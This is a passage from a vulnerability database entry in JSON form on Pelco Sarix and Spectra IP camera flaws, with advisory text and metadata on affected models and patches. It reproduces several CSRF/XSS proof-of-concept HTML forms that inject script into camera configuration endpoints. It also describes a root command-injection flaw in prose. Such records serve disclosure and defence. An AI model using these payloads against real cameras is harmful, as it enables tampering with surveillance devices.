1.8.2.18-20121109-1.9110-O3.8503)\n Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)\n\nSummary: Pelco offers the broadest selection of IP cameras designed\nfor security surveillance in a wide variety of commercial and industrial\nsettings. From our industry-leading fixed and high-speed IP cameras to\npanoramic, thermal imaging, explosionproof and more, we offer a camera\nfor any environment, any lighting condition and any application. \nWhen nothing but the best will do. SarixaC/ Enhanced Range cameras\nprovide the most robust feature-set for your mission-critical applications. \nWith SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image\nin difficult lighting conditions such as a combination of bright areas,\nshaded areas, and intense light. Designed with superior reliability,\nfault tolerance, and processing speed, these rugged fixed IP cameras\nensure you always get the video that you need. \n\nDesc: Pelco cameras suffer from multiple dom-based, stored and reflected\nXSS vulnerabilities when input passed via several parameters to several\nscripts is not properly sanitized before being returned to the user. \n\nTested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown\n MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)\n Lighttpd/1.4.28\n PHP/5.3.0\n\n\nVulnerability discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2017-5415\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php\n\n\n07.04.2017\n\n--\n\n\nCSRF/XSS on username parameter:\n-------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/dot1x/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"dot1x\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"protocol\" value=\"EAP\u0026#45;TLS\" /\u003e\n \u003cinput type=\"hidden\" name=\"inner\u0026#95;auth\" value=\"CHAP\" /\u003e\n \u003cinput type=\"hidden\" name=\"username\" value=\u0027\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"password\" value=\"blah\" /\u003e\n \u003cinput type=\"hidden\" name=\"anonymous\u0026#95;id\" value=\"\u0026#13;\" /\u003e\n \u003cinput type=\"hidden\" name=\"ca\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"client\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\u0026#95;password\" value=\"test\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:\n-------------------------------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"hostname\" value=\u0027\"\u003e\u003cscript\u003ealert(2)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"http\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(3)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"rtsp\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"dhcp\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\u0027\"\u003e\u003cscript\u003ealert(5)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\u0027\"\u003e\u003cscript\u003ealert(6)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"gateway\" value=\u0027\"\u003e\u003cscript\u003ealert(7)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"nameservers\" value=\u0027\"\u003e\u003cscript\u003ealert(8)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on version parameter:\n------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/snmp/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"version\" value=\u0027\";alert(9)//\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;community\u0026#95;string\" value=\"public\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;receiver\u0026#95;address\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;trap\u0026#95;community\u0026#95;string\" value=\"trapbratce\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:\n----------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/system/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"device\u0026#95;name\" value=\u0027ZSL\"\u003e\u003cscript\u003ealert(10)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;leds\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"smtp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(11)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\u0026#95;from\u0026#95;dhcp\" value=\"false\" /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\" value=\"\u0027;alert(12)//\u0027\" /\u003e\n \u003cinput type=\"hidden\" name=\"region\" value=\"Macedonia\u0027;alert(13)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"zone\" value=\"Kumanovo\u0027;alert(14)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;time\u0026#95;overlay\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;name\u0026#95;overlay\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"position\" value=\"topright\" /\u003e\n \u003cinput type=\"hidden\" name=\"date\u0026#95;format\" value=\"0\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nXSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:\n--------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/events/handlers/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"id\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;sentinel\" value=\"relay\u0026#95;sentinel\" /\u003e\n \u003cinput type=\"hidden\" name=\"name\" value=\u0027\"\u003e\u003cscript\u003ealert(15)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"type\" value=\"Ftp\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;to\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;from\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;subject\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;message\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\u0026#95;scale\" value=\"K\" /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(16)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;username\" value=\u0027\"\u003e\u003cscript\u003ealert(17)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;password\" value=\u0027\"\u003e\u003cscript\u003ealert(18)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;base\u0026#95;path\" value=\u0027\"\u003e\u003cscript\u003ealert(19)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;bankName\" value=\"GPIO\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;index\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;on\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;off\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;pulse\u0026#95;count\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;start0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;stop0\" value=\"\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7816"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "PACKETSTORM",
"id": "143313"
}
],
"trust": 2.97
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/pelco_rce.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelco_xss.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7816",
"trust": 3.0
},
{
"db": "SCHNEIDER",
"id": "SEVD-2019-045-03",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015516",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "42307",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "42307",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2019-15702",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-904",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "143313",
"trust": 0.2
},
{
"db": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "143315",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7829",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070080",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42309",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7827",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070075",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-904"
},
{
"db": "NVD",
"id": "CVE-2018-7816"
}
]
},
"id": "VAR-201905-1022",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-15702"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-15702"
}
]
},
"last_update_date": "2024-11-23T21:39:29.699000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SEVD-2019-045-03",
"trust": 0.8,
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03/"
},
{
"title": "Patch for SchneiderElectric1stGenPelcoSarixEnhancedCamera Permissions and Access Control Issue Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/162301"
},
{
"title": "Schneider Electric 1st Gen Pelco Sarix Enhanced Camera Fixes for permissions and access control issues vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=92882"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-904"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-264",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"db": "NVD",
"id": "CVE-2018-7816"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7816"
},
{
"trust": 1.8,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7816"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/42307/"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42309/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070080"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143315"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129667"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7829"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070075"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143313"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129665"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7827"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/dot1x/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/system/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/events/handlers/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/snmp/update\""
},
{
"trust": 0.1,
"url": "https://www.pelco.com"
},
{
"trust": 0.1,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5415.php"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-904"
},
{
"db": "NVD",
"id": "CVE-2018-7816"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-904"
},
{
"db": "NVD",
"id": "CVE-2018-7816"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-05-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"date": "2017-07-11T04:32:15",
"db": "PACKETSTORM",
"id": "143313"
},
{
"date": "2019-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-904"
},
{
"date": "2019-05-22T20:29:00.980000",
"db": "NVD",
"id": "CVE-2018-7816"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-05-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-904"
},
{
"date": "2024-11-21T04:12:47.140000",
"db": "NVD",
"id": "CVE-2018-7816"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-904"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Pelco Sarix Enhanced Camera Vulnerabilities related to authorization, permissions, and access control",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control issues",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-904"
}
],
"trust": 0.6
}
}
VAR-201905-1041
Vulnerability from variot - Updated: 2024-11-23 21:39An Improper Neutralization of Special Elements in Query vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera which allows an attacker to execute arbitrary system commands. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Contains a vulnerability in improper neutralization of special elements of data query logic.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera and SchneiderElectricSpectraEnhancedPTZCamera are products of Schneider Electric. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras. The Schneider Electric SpectraEnhancedPTZCamera is a series of spherical IP cameras. Security vulnerabilities exist in SchneiderElectric1stGen.PelcoSarixEnhancedCamera and SpectraEnhancedPTZCamera. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. SarixaC/ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
history.pushState('', '', '/')CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
history.pushState('', '', '/')CSRF/XSS on version parameter:
history.pushState('', '', '/')CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
history.pushState('', '', '/')XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
history.pushState('', '', '/') Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-1041",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "imes19-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe11",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixes1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe21",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ei",
"scope": "lt",
"trust": 1.0,
